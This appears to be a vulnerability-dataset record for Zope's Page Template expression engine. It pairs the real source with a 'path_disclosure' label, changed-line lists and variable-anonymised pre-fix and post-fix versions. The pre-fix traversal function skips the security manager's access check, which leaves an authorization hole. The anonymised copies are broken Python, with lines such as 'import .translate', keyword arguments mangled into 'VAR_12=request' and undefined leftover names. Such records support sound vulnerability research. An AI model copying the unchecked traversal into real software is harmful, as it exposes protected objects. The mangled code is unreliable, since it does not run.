# BooleanAttributesAndDefault.html test case)
if value is self.getDefault():
return value
return bool(value)
def evaluateStructure(self, expr):
""" customized version in order to get rid of unicode
errors for all and ever
"""
text = super().evaluateStructure(expr)
return self._handleText(text, expr)
def evaluateText(self, expr):
""" customized version in order to get rid of unicode
errors for all and ever
"""
text = self.evaluate(expr)
return self._handleText(text, expr)
def _handleText(self, text, expr):
if text is self.getDefault() or text is None:
# XXX: should be unicode???
return text
if isinstance(text, str):
# we love unicode, nothing to do
return text
elif isinstance(text, bytes):
# bahh...non-unicode string..we need to convert it to unicode
# catch ComponentLookupError in order to make tests shut-up.
# This should not be a problem since it won't change the old
# default behavior
resolver = queryUtility(IUnicodeEncodingConflictResolver)
if resolver is None:
return text.decode('ascii')
try:
return resolver.resolve(
self.contexts.get('context'), text, expr)
except UnicodeDecodeError as e:
LOG.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception text: %s\n"
"Template: %s\n"
"Rendered text: %r" %
(expr, resolver.__class__, e,
self.contexts['template'].absolute_url(1), text))
raise
else:
# This is a weird culprit ...calling text_type() on non-string
# objects
return str(text)
def createErrorInfo(self, err, position):
# Override, returning an object accessible to untrusted code.
# See: https://bugs.launchpad.net/zope2/+bug/174705
return ErrorInfo(err, position)
def evaluateCode(self, lang, code):
""" See ITALExpressionEngine.
o This method is a fossil: nobody actually calls it, but the
interface requires it.
"""
raise NotImplementedError
class ErrorInfo(BaseErrorInfo):
"""Information about an exception passed to an on-error handler.
"""
__allow_access_to_unprotected_subobjects__ = True
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ZopeEngine(Z3Engine):
_create_context = ZopeContext
class ZopeIterator(Iterator):
# allow iterator API to be accessed from (restricted) Python TALES
# expressions
__allow_access_to_unprotected_subobjects__ = True
# The things below used to be attributes in
# ZTUtils.Iterator.Iterator, however in zope.tales.tales.Iterator
# they're methods. We need BBB on the Python level so we redefine
# them as properties here. Eventually, we would like to get rid
# of them, though, so that we won't have to maintain yet another
# iterator class somewhere.
@property
def index(self):
return super().index()
@property
def start(self):
return super().start()
@property
def end(self):
return super().end()
@property
def item(self):
return super().item()
# 'first' and 'last' are Zope 2 enhancements to the TALES iterator
# spec.
def first(self, name=None):
if self.start:
return True
return not self.same_part(name, self._last_item, self.item)
def last(self, name=None):
if self.end:
return True
return not self.same_part(name, self.item, self._next)
def same_part(self, name, ob1, ob2):
if name is None:
return ob1 == ob2
no = object()
return getattr(ob1, name, no) == getattr(ob2, name, no) is not no
# 'first' needs to have access to the last item in the loop
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def next(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class PathIterator(ZopeIterator):
"""A TALES Iterator with the ability to use first() and last() on
subpaths of elements."""
def traverse(self, name, furtherPath):
if name in ('first', 'last'):
method = getattr(self, name)
# it's important that 'name' becomes a copy because we'll
# clear out 'furtherPath'
name = furtherPath[:]
if not name:
name = None
# make sure that traversal ends here with us
furtherPath[:] = []
return method(name)
return getattr(self, name)
def same_part(self, name, ob1, ob2):
if name is None:
return ob1 == ob2
if isinstance(name, str):
name = name.split('/')
elif isinstance(name, bytes):
name = name.split(b'/')
try:
ob1 = boboAwareZopeTraverse(ob1, name, None)
ob2 = boboAwareZopeTraverse(ob2, name, None)
except ZopeUndefs:
return False
return ob1 == ob2
class UnicodeAwareStringExpr(StringExpr):
def __call__(self, econtext):
vvals = []
if isinstance(self._expr, str):
# coerce values through the Unicode Conflict Resolver
evaluate = econtext.evaluateText
else:
evaluate = econtext.evaluate
for var in self._vars:
v = evaluate(var)
vvals.append(v)
return self._expr % tuple(vvals)
def createZopeEngine(zpe=ZopePathExpr, untrusted=True):
e = ZopeEngine()
e.iteratorFactory = PathIterator
for pt in zpe._default_type_names:
e.registerType(pt, zpe)
e.registerType('string', UnicodeAwareStringExpr)
e.registerType('python', ZRPythonExpr.PythonExpr)
e.registerType('not', NotExpr)
e.registerType('defer', DeferExpr)
e.registerType('lazy', LazyExpr)
e.registerType('provider', TALESProviderExpression)
e.registerBaseName('modules', SecureModuleImporter)
e.untrusted = untrusted
return e
def createTrustedZopeEngine():
# same as createZopeEngine, but use non-restricted Python
# expression evaluator
# still uses the ``SecureModuleImporter``
e = createZopeEngine(TrustedZopePathExpr, untrusted=False)
e.types['python'] = PythonExpr
return e
_engine = createZopeEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedZopeEngine()
def getTrustedEngine():
return _trusted_engine
| ##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Page Template Expression Engine
Page Template-specific implementation of TALES, with handlers
for Python expressions, string literals, and paths.
"""
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from AccessControl.SecurityManagement import getSecurityManager
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import translate
from zope.interface import implementer
from zope.pagetemplate.engine import ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
SecureModuleImporter = ZRPythonExpr._SecureModuleImporter()
LOG = logging.getLogger('Expressions')
# In Zope 2 traversal semantics, NotFound or Unauthorized (the Zope 2
# versions) indicate that traversal has failed. By default, zope.tales'
# engine doesn't recognize them as such which is why we extend its
# list here and make sure our implementation of the TALES
# Path Expression uses them
ZopeUndefs = Undefs + (NotFound, Unauthorized)
def boboAwareZopeTraverse(object, path_items, econtext):
"""Traverses a sequence of names, first trying attributes then items.
This uses zope.traversing path traversal where possible and interacts
correctly with objects providing OFS.interface.ITraversable when
necessary (bobo-awareness).
"""
request = getattr(econtext, 'request', None)
validate = getSecurityManager().validate
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if OFS.interfaces.ITraversable.providedBy(object):
object = object.restrictedTraverse(name)
else:
found = traversePathElement(object, name, path_items,
request=request)
# Special backwards compatibility exception for the name ``_``,
# which was often used for translation message factories.
# Allow and continue traversal.
if name == '_':
warnings.warn('Traversing to the name `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
object = found
continue
# All other names starting with ``_`` are disallowed.
# This emulates what restrictedTraverse does.
if name.startswith('_'):
raise NotFound(name)
# traversePathElement doesn't apply any Zope security policy,
# so we validate access explicitly here.
try:
validate(object, object, name, found)
object = found
except Unauthorized:
# Convert Unauthorized to prevent information disclosures
raise NotFound(name)
return object
def trustedBoboAwareZopeTraverse(object, path_items, econtext):
"""Traverses a sequence of names, first trying attributes then items.
This uses zope.traversing path traversal where possible and interacts
correctly with objects providing OFS.interface.ITraversable when
necessary (bobo-awareness).
"""
request = getattr(econtext, 'request', None)
path_items = list(path_items)
path_items.reverse()
while path_items:
name = path_items.pop()
if OFS.interfaces.ITraversable.providedBy(object):
object = object.unrestrictedTraverse(name)
else:
object = traversePathElement(object, name, path_items,
request=request)
return object
def render(ob, ns):
"""Calls the object, possibly a document template, or just returns
it if not callable. (From DT_Util.py)
"""
if hasattr(ob, '__render_with_namespace__'):
ob = ZRPythonExpr.call_with_ns(ob.__render_with_namespace__, ns)
else:
# items might be acquisition wrapped
base = aq_base(ob)
# item might be proxied (e.g. modules might have a deprecation
# proxy)
base = removeAllProxies(base)
if callable(base):
try:
if getattr(base, 'isDocTemp', 0):
ob = ZRPythonExpr.call_with_ns(ob, ns, 2)
else:
ob = ob()
except NotImplementedError:
pass
return ob
class _CombinedMapping:
"""Minimal auxiliary class to combine several mappings.
Earlier mappings take precedence.
"""
def __init__(self, *ms):
self.mappings = ms
def get(self, key, default):
for m in self.mappings:
value = m.get(key, self)
if value is not self:
return value
return default
class UntrustedSubPathExpr(SubPathExpr):
ALLOWED_BUILTINS = safe_builtins
class TrustedSubPathExpr(SubPathExpr):
# we allow both Python's builtins (we are trusted)
# as well as ``safe_builtins`` (because it may contain extensions)
# Python's builtins take precedence, because those of
# ``safe_builtins`` may have special restrictions for
# the use in an untrusted context
ALLOWED_BUILTINS = _CombinedMapping(
__builtins__,
safe_builtins)
class ZopePathExpr(PathExpr):
_TRAVERSER = staticmethod(boboAwareZopeTraverse)
SUBEXPR_FACTORY = UntrustedSubPathExpr
def __init__(self, name, expr, engine):
if not expr.strip():
expr = 'nothing'
super().__init__(name, expr, engine, self._TRAVERSER)
# override this to support different call metrics (see bottom of
# method) and Zope 2's traversal exceptions (ZopeUndefs instead of
# Undefs)
def _eval(self, econtext):
for expr in self._subexprs[:-1]:
# Try all but the last subexpression, skipping undefined ones.
try:
ob = expr(econtext)
except ZopeUndefs: # use Zope 2 expression types
pass
else:
break
else:
# On the last subexpression allow exceptions through.
ob = self._subexprs[-1](econtext)
if self._hybrid:
return ob
if self._name == 'nocall':
return ob
# this is where we are different from our super class:
return render(ob, econtext.vars)
# override this to support Zope 2's traversal exceptions
# (ZopeUndefs instead of Undefs)
def _exists(self, econtext):
for expr in self._subexprs:
try:
expr(econtext)
except ZopeUndefs: # use Zope 2 expression types
pass
else:
return 1
return 0
class TrustedZopePathExpr(ZopePathExpr):
_TRAVERSER = staticmethod(trustedBoboAwareZopeTraverse)
SUBEXPR_FACTORY = TrustedSubPathExpr
class SafeMapping(MultiMapping):
"""Mapping with security declarations and limited method exposure.
Since it subclasses MultiMapping, this class can be used to wrap
one or more mapping objects. Restricted Python code will not be
able to mutate the SafeMapping or the wrapped mappings, but will be
able to read any value.
"""
__allow_access_to_unprotected_subobjects__ = True
push = pop = None
_push = MultiMapping.push
_pop = MultiMapping.pop
class ZopeContext(Context):
def __init__(self, engine, contexts):
super().__init__(engine, contexts)
# wrap the top-level 'repeat' variable, as it is visible to
# restricted code
self.setContext('repeat', SafeMapping(self.repeat_vars))
# regenerate the first scope and the scope stack after messing
# with the global context
self.vars = vars = contexts.copy()
self._vars_stack = [vars]
def translate(self, msgid, domain=None, mapping=None, default=None):
context = self.contexts.get('request')
return translate(
msgid, domain=domain, mapping=mapping,
context=context, default=default)
def evaluateBoolean(self, expr):
value = self.evaluate(expr)
# here we override the normal zope.tales behaviour. zope.tales
# doesn't care about the default in a boolean expression,
# while we do (Zope 2 legacy, see the
# BooleanAttributesAndDefault.html test case)
if value is self.getDefault():
return value
return bool(value)
def evaluateStructure(self, expr):
""" customized version in order to get rid of unicode
errors for all and ever
"""
text = super().evaluateStructure(expr)
return self._handleText(text, expr)
def evaluateText(self, expr):
""" customized version in order to get rid of unicode
errors for all and ever
"""
text = self.evaluate(expr)
return self._handleText(text, expr)
def _handleText(self, text, expr):
if text is self.getDefault() or text is None:
# XXX: should be unicode???
return text
if isinstance(text, str):
# we love unicode, nothing to do
return text
elif isinstance(text, bytes):
# bahh...non-unicode string..we need to convert it to unicode
# catch ComponentLookupError in order to make tests shut-up.
# This should not be a problem since it won't change the old
# default behavior
resolver = queryUtility(IUnicodeEncodingConflictResolver)
if resolver is None:
return text.decode('ascii')
try:
return resolver.resolve(
self.contexts.get('context'), text, expr)
except UnicodeDecodeError as e:
LOG.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception text: %s\n"
"Template: %s\n"
"Rendered text: %r" %
(expr, resolver.__class__, e,
self.contexts['template'].absolute_url(1), text))
raise
else:
# This is a weird culprit ...calling text_type() on non-string
# objects
return str(text)
def createErrorInfo(self, err, position):
# Override, returning an object accessible to untrusted code.
# See: https://bugs.launchpad.net/zope2/+bug/174705
return ErrorInfo(err, position)
def evaluateCode(self, lang, code):
""" See ITALExpressionEngine.
o This method is a fossil: nobody actually calls it, but the
interface requires it.
"""
raise NotImplementedError
class ErrorInfo(BaseErrorInfo):
"""Information about an exception passed to an on-error handler.
"""
__allow_access_to_unprotected_subobjects__ = True
# Whether an engine is Zope aware does not depend on the class
# but how it is configured - especially, that is uses a Zope aware
# `PathExpr` implementation.
# Nevertheless, we mark the class as "Zope aware" for simplicity
# assuming that users of the class use a proper `PathExpr`
@implementer(IZopeAwareEngine)
class ZopeEngine(Z3Engine):
_create_context = ZopeContext
class ZopeIterator(Iterator):
# allow iterator API to be accessed from (restricted) Python TALES
# expressions
__allow_access_to_unprotected_subobjects__ = True
# The things below used to be attributes in
# ZTUtils.Iterator.Iterator, however in zope.tales.tales.Iterator
# they're methods. We need BBB on the Python level so we redefine
# them as properties here. Eventually, we would like to get rid
# of them, though, so that we won't have to maintain yet another
# iterator class somewhere.
@property
def index(self):
return super().index()
@property
def start(self):
return super().start()
@property
def end(self):
return super().end()
@property
def item(self):
return super().item()
# 'first' and 'last' are Zope 2 enhancements to the TALES iterator
# spec.
def first(self, name=None):
if self.start:
return True
return not self.same_part(name, self._last_item, self.item)
def last(self, name=None):
if self.end:
return True
return not self.same_part(name, self.item, self._next)
def same_part(self, name, ob1, ob2):
if name is None:
return ob1 == ob2
no = object()
return getattr(ob1, name, no) == getattr(ob2, name, no) is not no
# 'first' needs to have access to the last item in the loop
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def next(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class PathIterator(ZopeIterator):
"""A TALES Iterator with the ability to use first() and last() on
subpaths of elements."""
def traverse(self, name, furtherPath):
if name in ('first', 'last'):
method = getattr(self, name)
# it's important that 'name' becomes a copy because we'll
# clear out 'furtherPath'
name = furtherPath[:]
if not name:
name = None
# make sure that traversal ends here with us
furtherPath[:] = []
return method(name)
return getattr(self, name)
def same_part(self, name, ob1, ob2):
if name is None:
return ob1 == ob2
if isinstance(name, str):
name = name.split('/')
elif isinstance(name, bytes):
name = name.split(b'/')
try:
ob1 = boboAwareZopeTraverse(ob1, name, None)
ob2 = boboAwareZopeTraverse(ob2, name, None)
except ZopeUndefs:
return False
return ob1 == ob2
class UnicodeAwareStringExpr(StringExpr):
def __call__(self, econtext):
vvals = []
if isinstance(self._expr, str):
# coerce values through the Unicode Conflict Resolver
evaluate = econtext.evaluateText
else:
evaluate = econtext.evaluate
for var in self._vars:
v = evaluate(var)
vvals.append(v)
return self._expr % tuple(vvals)
def createZopeEngine(zpe=ZopePathExpr, untrusted=True):
e = ZopeEngine()
e.iteratorFactory = PathIterator
for pt in zpe._default_type_names:
e.registerType(pt, zpe)
e.registerType('string', UnicodeAwareStringExpr)
e.registerType('python', ZRPythonExpr.PythonExpr)
e.registerType('not', NotExpr)
e.registerType('defer', DeferExpr)
e.registerType('lazy', LazyExpr)
e.registerType('provider', TALESProviderExpression)
e.registerBaseName('modules', SecureModuleImporter)
e.untrusted = untrusted
return e
def createTrustedZopeEngine():
# same as createZopeEngine, but use non-restricted Python
# expression evaluator
# still uses the ``SecureModuleImporter``
e = createZopeEngine(TrustedZopePathExpr, untrusted=False)
e.types['python'] = PythonExpr
return e
_engine = createZopeEngine()
def getEngine():
return _engine
_trusted_engine = createTrustedZopeEngine()
def getTrustedEngine():
return _trusted_engine
| path_disclosure | {
"code": [
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" 'and will be removed in Zope 6.',",
" DeprecationWarning)",
" elif name.startswith('_'):",
" raise NotFound(name)",
" object = traversePathElement(object, name, path_items,",
" request=request)"
],
"line_no": [
79,
80,
81,
82,
83,
84,
89,
90
]
} | {
"code": [
"from AccessControl.SecurityManagement import getSecurityManager",
" validate = getSecurityManager().validate",
" found = traversePathElement(object, name, path_items,",
" if name == '_':",
" warnings.warn('Traversing to the name `_` is deprecated '",
" DeprecationWarning)",
" object = found",
" if name.startswith('_'):",
" try:",
" validate(object, object, name, found)",
" object = found",
" except Unauthorized:",
" raise NotFound(name)"
],
"line_no": [
24,
74,
84,
90,
91,
93,
94,
99,
104,
105,
106,
107,
109
]
} |
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import .translate
from zope.interface import implementer
from zope.pagetemplate.engine import .ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import .ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
VAR_0 = ZRPythonExpr._SecureModuleImporter()
VAR_1 = logging.getLogger('Expressions')
VAR_2 = Undefs + (NotFound, Unauthorized)
def FUNC_0(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_19 = VAR_4.pop()
if VAR_19 == '_':
warnings.warn('Traversing to the VAR_19 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
elif VAR_19.startswith('_'):
raise NotFound(VAR_19)
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.restrictedTraverse(VAR_19)
else:
VAR_3 = traversePathElement(VAR_3, VAR_19, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_1(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_19 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.unrestrictedTraverse(VAR_19)
else:
VAR_3 = traversePathElement(VAR_3, VAR_19, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_2(VAR_6, VAR_7):
if hasattr(VAR_6, '__render_with_namespace__'):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6.__render_with_namespace__, VAR_7)
else:
VAR_40 = aq_base(VAR_6)
VAR_40 = removeAllProxies(VAR_40)
if callable(VAR_40):
try:
if getattr(VAR_40, 'isDocTemp', 0):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6, VAR_7, 2)
else:
VAR_6 = ob()
except NotImplementedError:
pass
return VAR_6
class CLASS_0:
def __init__(self, *VAR_13):
self.mappings = VAR_13
def FUNC_7(self, VAR_14, VAR_15):
for m in self.mappings:
VAR_43 = m.get(VAR_14, self)
if VAR_43 is not self:
return VAR_43
return VAR_15
class CLASS_1(SubPathExpr):
VAR_16 = safe_builtins
class CLASS_2(SubPathExpr):
VAR_16 = CLASS_0(
__builtins__,
safe_builtins)
class CLASS_3(PathExpr):
VAR_17 = staticmethod(FUNC_0)
VAR_18 = CLASS_1
def __init__(self, VAR_19, VAR_20, VAR_21):
if not VAR_20.strip():
VAR_20 = 'nothing'
super().__init__(VAR_19, VAR_20, VAR_21, self._TRAVERSER)
def FUNC_8(self, VAR_5):
for VAR_20 in self._subexprs[:-1]:
try:
VAR_6 = VAR_20(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
break
else:
VAR_6 = self._subexprs[-1](VAR_5)
if self._hybrid:
return VAR_6
if self._name == 'nocall':
return VAR_6
return FUNC_2(VAR_6, VAR_5.vars)
def FUNC_9(self, VAR_5):
for VAR_20 in self._subexprs:
try:
VAR_20(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
return 1
return 0
class CLASS_4(CLASS_3):
VAR_17 = staticmethod(FUNC_1)
VAR_18 = CLASS_2
class CLASS_5(MultiMapping):
__allow_access_to_unprotected_subobjects__ = True
VAR_22 = VAR_23 = None
VAR_24 = MultiMapping.push
VAR_25 = MultiMapping.pop
class CLASS_6(Context):
def __init__(self, VAR_21, VAR_26):
super().__init__(VAR_21, VAR_26)
self.setContext('repeat', CLASS_5(self.repeat_vars))
self.vars = VAR_41 = VAR_26.copy()
self._vars_stack = [VAR_41]
def FUNC_10(self, VAR_27, VAR_28=None, VAR_29=None, VAR_15=None):
VAR_42 = self.contexts.get('request')
return FUNC_10(
VAR_27, VAR_28=domain, VAR_29=mapping,
VAR_42=context, VAR_15=default)
def FUNC_11(self, VAR_20):
VAR_43 = self.evaluate(VAR_20)
if VAR_43 is self.getDefault():
return VAR_43
return bool(VAR_43)
def FUNC_12(self, VAR_20):
VAR_30 = super().evaluateStructure(VAR_20)
return self._handleText(VAR_30, VAR_20)
def FUNC_13(self, VAR_20):
VAR_30 = self.evaluate(VAR_20)
return self._handleText(VAR_30, VAR_20)
def FUNC_14(self, VAR_30, VAR_20):
if VAR_30 is self.getDefault() or VAR_30 is None:
return VAR_30
if isinstance(VAR_30, str):
return VAR_30
elif isinstance(VAR_30, bytes):
VAR_49 = queryUtility(IUnicodeEncodingConflictResolver)
if VAR_49 is None:
return VAR_30.decode('ascii')
try:
return VAR_49.resolve(
self.contexts.get('context'), VAR_30, VAR_20)
except UnicodeDecodeError as VAR_39:
VAR_1.error("UnicodeDecodeError detected for expression \"%s\"\n"
"Resolver class: %s\n"
"Exception VAR_30: %s\n"
"Template: %s\n"
"Rendered VAR_30: %r" %
(VAR_20, VAR_49.__class__, VAR_39,
self.contexts['template'].absolute_url(1), VAR_30))
raise
else:
return str(VAR_30)
def FUNC_15(self, VAR_31, VAR_32):
return CLASS_7(VAR_31, VAR_32)
def FUNC_16(self, VAR_33, VAR_34):
raise NotImplementedError
class CLASS_7(BaseErrorInfo):
__allow_access_to_unprotected_subobjects__ = True
@implementer(IZopeAwareEngine)
class CLASS_8(Z3Engine):
VAR_35 = CLASS_6
class CLASS_9(Iterator):
__allow_access_to_unprotected_subobjects__ = True
@property
def FUNC_17(self):
return super().index()
@property
def FUNC_18(self):
return super().start()
@property
def FUNC_19(self):
return super().end()
@property
def FUNC_20(self):
return super().item()
def FUNC_21(self, VAR_19=None):
if self.start:
return True
return not self.same_part(VAR_19, self._last_item, self.item)
def FUNC_22(self, VAR_19=None):
if self.end:
return True
return not self.same_part(VAR_19, self.item, self._next)
def FUNC_23(self, VAR_19, VAR_36, VAR_37):
if VAR_19 is None:
return VAR_36 == VAR_37
VAR_44 = VAR_3()
return getattr(VAR_36, VAR_19, VAR_44) == getattr(VAR_37, VAR_19, VAR_44) is not VAR_44
def __next__(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().__next__()
def FUNC_24(self):
if self._nextIndex > 0:
self._last_item = self.item
return super().next()
@implementer(ITraversable)
class CLASS_10(CLASS_9):
def FUNC_25(self, VAR_19, VAR_38):
if VAR_19 in ('first', 'last'):
VAR_46 = getattr(self, VAR_19)
VAR_19 = VAR_38[:]
if not VAR_19:
VAR_19 = None
VAR_38[:] = []
return VAR_46(VAR_19)
return getattr(self, VAR_19)
def FUNC_23(self, VAR_19, VAR_36, VAR_37):
if VAR_19 is None:
return VAR_36 == VAR_37
if isinstance(VAR_19, str):
VAR_19 = VAR_19.split('/')
elif isinstance(VAR_19, bytes):
VAR_19 = VAR_19.split(b'/')
try:
VAR_36 = FUNC_0(VAR_36, VAR_19, None)
VAR_37 = FUNC_0(VAR_37, VAR_19, None)
except VAR_2:
return False
return VAR_36 == VAR_37
class CLASS_11(StringExpr):
def __call__(self, VAR_5):
VAR_45 = []
if isinstance(self._expr, str):
VAR_47 = VAR_5.evaluateText
else:
VAR_47 = VAR_5.evaluate
for var in self._vars:
VAR_48 = VAR_47(var)
VAR_45.append(VAR_48)
return self._expr % tuple(VAR_45)
def FUNC_3(VAR_8=CLASS_3, VAR_9=True):
VAR_39 = CLASS_8()
VAR_39.iteratorFactory = CLASS_10
for pt in VAR_8._default_type_names:
VAR_39.registerType(pt, VAR_8)
VAR_39.registerType('string', CLASS_11)
VAR_39.registerType('python', ZRPythonExpr.PythonExpr)
VAR_39.registerType('not', NotExpr)
VAR_39.registerType('defer', DeferExpr)
VAR_39.registerType('lazy', LazyExpr)
VAR_39.registerType('provider', TALESProviderExpression)
VAR_39.registerBaseName('modules', VAR_0)
VAR_39.untrusted = VAR_9
return VAR_39
def FUNC_4():
VAR_39 = FUNC_3(CLASS_4, VAR_9=False)
VAR_39.types['python'] = PythonExpr
return VAR_39
VAR_10 = FUNC_3()
def FUNC_5():
return VAR_10
VAR_11 = FUNC_4()
def FUNC_6():
return VAR_11
|
import logging
import warnings
import OFS.interfaces
from AccessControl import safe_builtins
from AccessControl.SecurityManagement import .getSecurityManager
from Acquisition import aq_base
from MultiMapping import MultiMapping
from zExceptions import NotFound
from zExceptions import Unauthorized
from zope.component import queryUtility
from zope.contentprovider.tales import TALESProviderExpression
from zope.i18n import .translate
from zope.interface import implementer
from zope.pagetemplate.engine import .ZopeEngine as Z3Engine
from zope.proxy import removeAllProxies
from zope.tales.expressions import DeferExpr
from zope.tales.expressions import LazyExpr
from zope.tales.expressions import NotExpr
from zope.tales.expressions import PathExpr
from zope.tales.expressions import StringExpr
from zope.tales.expressions import SubPathExpr
from zope.tales.expressions import Undefs
from zope.tales.pythonexpr import PythonExpr
from zope.tales.tales import Context
from zope.tales.tales import .ErrorInfo as BaseErrorInfo
from zope.tales.tales import Iterator
from zope.traversing.adapters import .traversePathElement
from zope.traversing.interfaces import ITraversable
from . import ZRPythonExpr
from .interfaces import IUnicodeEncodingConflictResolver
from .interfaces import IZopeAwareEngine
VAR_0 = ZRPythonExpr._SecureModuleImporter()
VAR_1 = logging.getLogger('Expressions')
VAR_2 = Undefs + (NotFound, Unauthorized)
def FUNC_0(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_13 = getSecurityManager().validate
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_20 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.restrictedTraverse(VAR_20)
else:
VAR_47 = traversePathElement(VAR_3, VAR_20, VAR_4,
VAR_12=request)
if VAR_20 == '_':
warnings.warn('Traversing to the VAR_20 `_` is deprecated '
'and will be removed in Zope 6.',
DeprecationWarning)
VAR_3 = VAR_47
continue
if VAR_20.startswith('_'):
raise NotFound(VAR_20)
try:
VAR_13(VAR_3, VAR_3, VAR_20, VAR_47)
VAR_3 = VAR_47
except Unauthorized:
raise NotFound(VAR_20)
return VAR_3
def FUNC_1(VAR_3, VAR_4, VAR_5):
VAR_12 = getattr(VAR_5, 'request', None)
VAR_4 = list(VAR_4)
path_items.reverse()
while VAR_4:
VAR_20 = VAR_4.pop()
if OFS.interfaces.ITraversable.providedBy(VAR_3):
VAR_3 = VAR_3.unrestrictedTraverse(VAR_20)
else:
VAR_3 = traversePathElement(VAR_3, VAR_20, VAR_4,
VAR_12=request)
return VAR_3
def FUNC_2(VAR_6, VAR_7):
if hasattr(VAR_6, '__render_with_namespace__'):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6.__render_with_namespace__, VAR_7)
else:
VAR_41 = aq_base(VAR_6)
VAR_41 = removeAllProxies(VAR_41)
if callable(VAR_41):
try:
if getattr(VAR_41, 'isDocTemp', 0):
VAR_6 = ZRPythonExpr.call_with_ns(VAR_6, VAR_7, 2)
else:
VAR_6 = ob()
except NotImplementedError:
pass
return VAR_6
class CLASS_0:
def __init__(self, *VAR_14):
self.mappings = VAR_14
def FUNC_7(self, VAR_15, VAR_16):
for m in self.mappings:
VAR_44 = m.get(VAR_15, self)
if VAR_44 is not self:
return VAR_44
return VAR_16
class CLASS_1(SubPathExpr):
VAR_17 = safe_builtins
class CLASS_2(SubPathExpr):
VAR_17 = CLASS_0(
__builtins__,
safe_builtins)
class CLASS_3(PathExpr):
VAR_18 = staticmethod(FUNC_0)
VAR_19 = CLASS_1
def __init__(self, VAR_20, VAR_21, VAR_22):
if not VAR_21.strip():
VAR_21 = 'nothing'
super().__init__(VAR_20, VAR_21, VAR_22, self._TRAVERSER)
def FUNC_8(self, VAR_5):
for VAR_21 in self._subexprs[:-1]:
try:
VAR_6 = VAR_21(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
break
else:
VAR_6 = self._subexprs[-1](VAR_5)
if self._hybrid:
return VAR_6
if self._name == 'nocall':
return VAR_6
return FUNC_2(VAR_6, VAR_5.vars)
def FUNC_9(self, VAR_5):
for VAR_21 in self._subexprs:
try:
VAR_21(VAR_5)
except VAR_2: # use Zope 2 expression types
pass
else:
return 1
return 0
class CLASS_4(CLASS_3):
VAR_18 = staticmethod(FUNC_1)
VAR_19 = CLASS_2
class CLASS_5(MultiMapping):
